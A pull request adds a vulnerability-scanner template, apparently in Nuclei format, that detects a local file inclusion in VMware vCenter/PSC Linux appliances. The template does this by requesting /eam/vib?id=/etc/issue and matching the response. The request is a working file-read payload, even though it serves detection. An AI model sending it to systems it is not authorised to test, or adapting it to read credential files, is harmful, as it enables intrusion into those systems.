### PR TITLE
Linux appliance version of vmware-vcenter-lfi.yaml

### DIFF
--- a/vulnerabilities/vmware-vcenter-lfi-linux.yaml
+++ b/vulnerabilities/vmware-vcenter-lfi-linux.yaml
@@ -1,0 +1,15 @@
+id: vmware-vcenter-lfi-linux
+
+info:
+  name: Vmware Vcenter LFI for Linux appliances
+  author: PR3R00T
+  severity: HIGH
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/eam/vib?id=/etc/issue"
+    matchers:
+      - type: word
+        words:
+          - "vCenter Server"

--- a/vulnerabilities/vmware-vcenter-lfi-linux.yaml
+++ b/vulnerabilities/vmware-vcenter-lfi-linux.yaml
@@ -3,7 +3,7 @@ id: vmware-vcenter-lfi-linux
 info:
   name: Vmware Vcenter LFI for Linux appliances
   author: PR3R00T
-  severity: HIGH
+  severity: high
 
 requests:
   - method: GET


### PR DESCRIPTION
Looking into the references in vmware-vcenter-lfi.yaml, Twitter comments also mentioned it affecting the Linux appliance version (VMWare PSC). 
I created this template and tested it on vulnerable PSCs.